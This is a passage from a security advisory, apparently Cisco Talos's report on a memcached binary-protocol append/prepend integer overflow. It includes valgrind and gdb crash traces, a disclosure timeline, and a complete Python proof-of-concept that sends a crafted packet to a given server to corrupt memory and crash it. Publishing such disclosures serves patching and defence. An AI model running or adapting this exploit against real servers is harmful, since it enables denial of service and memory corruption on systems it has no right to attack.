= struct.pack(\"!Q\",0)\n body = \"A\"*1024\n \n\nIn the above packet, body length is specified to be 0, and key length 0xfa, resulting in an integer overflow which causes too small area of memory to be allocated causing a heap buffer overflow.\n\nThe vulnerability can be triggered multiple times, and can be abused to modify internal slab metadata. As such, it can also be abused to cause information leaks required for successful exploitation.\n\n### Crash Information\n\nSimply sending the above packet triggers the heap overflow but doesn\u2019t cause a direct crash. 
In order to observe the issue, the server can be run under valgrind which then results in the following trace:\n \n \n <37 new auto-negotiating client connection\n 37: going from conn_new_cmd to conn_waiting\n 37: going from conn_waiting to conn_read\n 37: going from conn_read to conn_parse_cmd\n 37: Client using the binary protocol\n <37 Read binary protocol data:\n <37 0x80 0x1a 0x00 0xfa\n <37 0x00 0x00 0x00 0x00\n <37 0x00 0x00 0x00 0x00\n <37 0x00 0x00 0x00 0x00\n <37 0x00 0x00 0x00 0x00\n <37 0x00 0x00 0x00 0x00\n 37: going from conn_parse_cmd to conn_nread\n Value len is -250\n 36: going from conn_write to conn_new_cmd\n 36: going from conn_new_cmd to conn_waiting\n 36: going from conn_waiting to conn_read\n 36: going from conn_read to conn_closing\n <36 connection closed.\n ==466== Thread 4:\n ==466== Invalid write of size 4\n ==466== at 0x402FCC2: memcpy (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)\n ==466== by 0x8059CB9: do_item_alloc (items.c:240)\n ==466== by 0x8051589: process_bin_append_prepend (memcached.c:2302)\n ==466== by 0x8051589: complete_nread_binary (memcached.c:2425)\n ==466== by 0x8051589: complete_nread (memcached.c:2484)\n ==466== by 0x80540AE: drive_machine (memcached.c:4656)\n ==466== by 0x40686B5: event_base_loop (in /usr/lib/libevent-2.0.so.5.1.9)\n ==466== by 0x805B1B8: worker_libevent (thread.c:380)\n ==466== by 0x40CB312: start_thread (pthread_create.c:310)\n ==466== by 0x41DAF2D: clone (clone.S:122)\n ==466== Address 0x459cc48 is 0 bytes after a block of size 1,048,560 alloc'd\n ==466== at 0x402B211: malloc (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)\n ==466== by 0x8056218: memory_allocate (slabs.c:538)\n ==466== by 0x8056218: do_slabs_newslab (slabs.c:233)\n ==466== by 0x8056295: do_slabs_alloc (slabs.c:328)\n ==466== by 0x8056843: slabs_alloc (slabs.c:584)\n ==466== by 0x8059B7D: do_item_alloc (items.c:180)\n ==466== by 0x804E515: process_update_command (memcached.c:3403)\n ==466== by 0x8052024: 
process_command (memcached.c:3840)\n ==466== by 0x8053AA5: try_read_command (memcached.c:4205)\n ==466== by 0x8053AA5: drive_machine (memcached.c:4618)\n ==466== by 0x40686B5: event_base_loop (in /usr/lib/libevent-2.0.so.5.1.9)\n ==466== by 0x805B1B8: worker_libevent (thread.c:380)\n ==466== by 0x40CB312: start_thread (pthread_create.c:310)\n ==466== by 0x41DAF2D: clone (clone.S:122)\n ==466==\n ==466== Invalid read of size 4\n ==466== at 0x804D16E: conn_set_state.isra.3 (memcached.c:794)\n ==466== by 0x8050D52: process_bin_update (memcached.c:2278)\n ==466== by 0x8050D52: complete_nread_binary (memcached.c:2427)\n ==466== by 0x8050D52: complete_nread (memcached.c:2484)\n ==466== by 0x80540AE: drive_machine (memcached.c:4656)\n ==466== by 0x40686B5: event_base_loop (in /usr/lib/libevent-2.0.so.5.1.9)\n ==466== by 0x805B1B8: worker_libevent (thread.c:380)\n ==466== by 0x40CB312: start_thread (pthread_create.c:310)\n ==466== by 0x41DAF2D: clone (clone.S:122)\n ==466== Address 0xafba654 is not stack'd, malloc'd or (recently) free'd\n \n\nA complete server crash can be achieved by simply corrupting an existing item and then trying to retrieve it as demonstrated by the attached proof of concept. 
In that case, the process crashes in the following manner:\n \n \n <30 new auto-negotiating client connection\n 30: going from conn_new_cmd to conn_waiting\n 30: going from conn_waiting to conn_read\n 30: going from conn_read to conn_parse_cmd\n 30: Client using the ascii protocol\n <30 set testkey 0 60 4\n 30: going from conn_parse_cmd to conn_nread\n > NOT FOUND testkey\n >30 STORED\n 30: going from conn_nread to conn_write\n 30: going from conn_write to conn_new_cmd\n 30: going from conn_new_cmd to conn_waiting\n 30: going from conn_waiting to conn_read\n 30: going from conn_read to conn_closing\n <30 connection closed.\n <30 new auto-negotiating client connection\n 30: going from conn_new_cmd to conn_waiting\n 30: going from conn_waiting to conn_read\n 30: going from conn_read to conn_parse_cmd\n 30: Client using the binary protocol\n <30 Read binary protocol data:\n <30 0x80 0x1a 0x00 0xfa\n <30 0x00 0x00 0x00 0x00\n <30 0x00 0x00 0x00 0x00\n <30 0x00 0x00 0x00 0x00\n <30 0x00 0x00 0x00 0x00\n <30 0x00 0x00 0x00 0x00\n 30: going from conn_parse_cmd to conn_nread\n Value len is -250\n Invalid rlbytes to read: len -250\n 30: going from conn_nread to conn_closing\n <30 connection closed.\n <30 new auto-negotiating client connection\n 30: going from conn_new_cmd to conn_waiting\n 30: going from conn_waiting to conn_read\n 30: going from conn_read to conn_parse_cmd\n 30: Client using the ascii protocol\n <30 get testkey\n \n Program received signal SIGSEGV, Segmentation fault.\n [Switching to Thread 0xb6d3db40 (LWP 530)]\n [----------------------------------registers-----------------------------------]\n EAX: 0x41 ('A')\n EBX: 0x8001ce00 --> 0x1ccf8\n ECX: 0x10\n EDX: 0xb7d40008 --> 0x0\n ESI: 0x41414141 ('AAAA')\n EDI: 0xb5423b04 (\"testkey\")\n EBP: 0x7\n ESP: 0xb6d3d060 --> 0x0\n EIP: 0x80011af7 (<assoc_find+103>:\tmovzx eax,BYTE PTR [esi+0x1d])\n EFLAGS: 0x10206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)\n 
[-------------------------------------code-------------------------------------]\n 0x80011af0 <assoc_find+96>:\tmov esi,DWORD PTR [esi+0x8]\n 0x80011af3 <assoc_find+99>:\ttest esi,esi\n 0x80011af5 <assoc_find+101>:\tje 0x80011b22 <assoc_find+146>\n => 0x80011af7 <assoc_find+103>:\tmovzx eax,BYTE PTR [esi+0x1d]\n 0x80011afb <assoc_find+107>:\tcmp eax,ebp\n 0x80011afd <assoc_find+109>:\tjne 0x80011af0 <assoc_find+96>\n 0x80011aff <assoc_find+111>:\tmovzx eax,BYTE PTR [esi+0x1b]\n 0x80011b03 <assoc_find+115>:\tmov DWORD PTR [esp+0x8],ebp\n [------------------------------------stack-------------------------------------]\n 0000| 0xb6d3d060 --> 0x0\n 0004| 0xb6d3d064 --> 0x0\n 0008| 0xb6d3d068 --> 0x0\n 0012| 0xb6d3d06c --> 0x0\n 0016| 0xb6d3d070 --> 0x0\n 0020| 0xb6d3d074 --> 0x0\n 0024| 0xb6d3d078 --> 0x80011a99 (<assoc_find+9>:\tadd ebx,0xb367)\n 0028| 0xb6d3d07c --> 0x8001ce00 --> 0x1ccf8\n [------------------------------------------------------------------------------]\n Legend: code, data, rodata, value\n Stopped reason: SIGSEGV\n 0x80011af7 in assoc_find ()\n gdb-peda$\n \n\n### Exploit Proof-of-Concept (optional)\n \n \n import struct\n import socket\n import sys\n \n MEMCACHED_REQUEST_MAGIC = \"\\x80\"\n OPCODE_PREPEND_Q = \"\\x1a\"\n key_len = struct.pack(\"!H\",0xfa)\n extra_len = \"\\x00\"\n data_type = \"\\x00\"\n vbucket = \"\\x00\\x00\"\n body_len = struct.pack(\"!I\",0)\n opaque = struct.pack(\"!I\",0)\n CAS = struct.pack(\"!Q\",0)\n body = \"A\"*1024\n \n if len(sys.argv) != 3:\n print \"./poc_crash.py <server> <port>\"\n \n packet = MEMCACHED_REQUEST_MAGIC + OPCODE_PREPEND_Q + key_len + extra_len\n packet += data_type + vbucket + body_len + opaque + CAS\n packet += body\n \n set_packet = \"set testkey 0 60 4\\r\\ntest\\r\\n\"\n get_packet = \"get testkey\\r\\n\"\n \n s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s1.connect((sys.argv[1],int(sys.argv[2])))\n s1.sendall(set_packet)\n print s1.recv(1024)\n s1.close()\n \n \n s2 = 
socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s2.connect((sys.argv[1],int(sys.argv[2])))\n s2.sendall(packet)\n print s2.recv(1024)\n s2.close()\n \n s3 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s3.connect((sys.argv[1],int(sys.argv[2])))\n s3.sendall(get_packet)\n s3.recv(1024)\n s3.close()\n \n\n### Timeline\n\n2016-10-10 - Vendor Disclosure \n2016-10-12 - Patch Fixed \n2016-10-31 - Public Release\n\n##### Credit\n\nDiscovered by Aleksandar Nikolic of Cisco Talos.\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2016-0260\n\nPrevious Report\n\nTALOS-2016-0220\n", "edition": 12, "modified": "2016-10-31T00:00:00", "published": "2016-10-31T00:00:00", "id": "TALOS-2016-0219", "href": "http://www.talosintelligence.com/vulnerability_reports/TALOS-2016-0219", "title": "Memcached Server Append/Prepend Remote Code Execution Vulnerability", "type": "talos", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}